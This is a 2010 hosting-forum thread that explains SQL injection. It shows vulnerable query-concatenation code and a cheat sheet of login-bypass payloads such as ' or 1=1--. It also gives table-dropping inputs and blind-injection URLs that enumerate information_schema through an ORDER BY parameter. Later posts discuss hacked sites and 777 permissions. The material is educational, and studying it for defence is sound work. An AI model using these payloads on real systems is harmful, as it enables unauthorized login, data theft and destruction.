sql injection vulnerability:::::::::::::::::Be Secure

Discussion in 'General Web Coding' started by mohit, Oct 5, 2010.

  1. mohit Guppy

    SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

    --------------------------------------------------------------------------------------------------------
    Forms of vulnerability
    --------------------------------------------------------------------------------------------------------

    Incorrectly filtered escape characters

    This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application.

    The following line of code illustrates this vulnerability:

    statement = "SELECT * FROM users WHERE name = '" + userName + "';"

    This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as

    ' or '1'='1

    Or using comments to even block the rest of the query:

    ' or '1'='1';/*'

    renders this SQL statement by the parent language:

    SELECT * FROM users WHERE name = '' OR '1'='1';

    If this code were to be used in an authentication procedure then this example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.

    The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements:

    a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

    This input renders the final SQL statement as follows:

    SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

    While most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP's mysql_query() do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them from modifying queries.
    [edit] Incorrect type handling

    This form of SQL injection occurs when a user supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric. For example:

    statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"

    It is clear from this statement that the author intended a_variable to be a number correlating to the "id" field. However, if it is in fact a string then the end user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to

    1;DROP TABLE users

    will drop (delete) the "users" table from the database, since the SQL would be rendered as follows:

    SELECT * FROM userinfo WHERE id=1;DROP TABLE users;


    SQL INJECTION CHEAT SHEET


    Bypassing Login Screens (SMO+)
    SQL Injection 101, Login tricks

    * admin' --
    * admin' #
    * admin'/*
    * ' or 1=1--
    * ' or 1=1#
    * ' or 1=1/*
    * ') or '1'='1--
    * ') or ('1'='1--
    * ....

    * Login as different user (SM*)
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
  2. mohit Guppy

    eXploiting SQL injection in ORDER BY clause (MySQL 5)
    by Jacco van Tuijl

    This URL will show a list orderd by column 1 :
    http://www.test.com/list.php?orderby=1

    This is what the SQL query that is executed on the database might look like:
    SELECT id,name,price FROM list ORDER BY 1


    If it would be vulnerable to SQL injection we could try :

    http://www.test.com/list.php?orderby=if(true,id,price)
    and
    http://www.test.com/list.php?orderby=if(false,id,price)
    to see if they give a different result

    or

    http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
    and
    http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
    to see if they give a different result.

    If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this:
    http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)
    and this:
    http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)

    The backside of these methods is that they require knowlage of the column names.
    So I worked out some different method that doesn't require knowlage about column names.

    ORDER BY rand()

    this request:
    http://www.test.com/list.php?orderby=rand(true)
    returns a different result then this request:
    http://www.test.com/list.php?orderby=rand(false)

    We can use it to enumerate the first char of the table_name in information_schema.tables like this:
    http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))

    and it is all quoteless
  3. pridkiki Guppy

  4. clubmelia Guppy

    Mohit! How do I get ahold of you? I have been telling anyone that will listen that I think a large number of sites on various servers have been penetrated possibly by a php shell exploit to take over the server. Various sites are infected by malware across different webservers, on the 2 reseller clusters and shared hosting environments. I know I have 2 resellers, managed some shared hosting accounts and have friends on shared hosting accounts that are hacked. Look at this Google safe browsing report;
    and these articles on the specific problem that I have eradicted but keep coming back weeks later.
    I have randomized infections across accounts and then randomized infections in files. I delete everything and put an entirely different site up and it will get infected, when it doesn't have anything to get infected. No flash, no javascripts, no 3rd party scripts. I have one site infected and it only has an index.html file in its root... thats it! The hack is at the host level.

    thanks!
  5. Stephen US Operations

    We have found the issue of it, it is due to 777 permissions, Sachin will mail you details all of them that are having issues having 777 folder.
    777 allows access, to anyone, anytime. Very bad set of permissions.

Share This Page

JodoHost - 26,000 hosting end-users in 100 countries
Plesk Web Hosting
VPS Hosting
H-Sphere Web Hosting
Other Services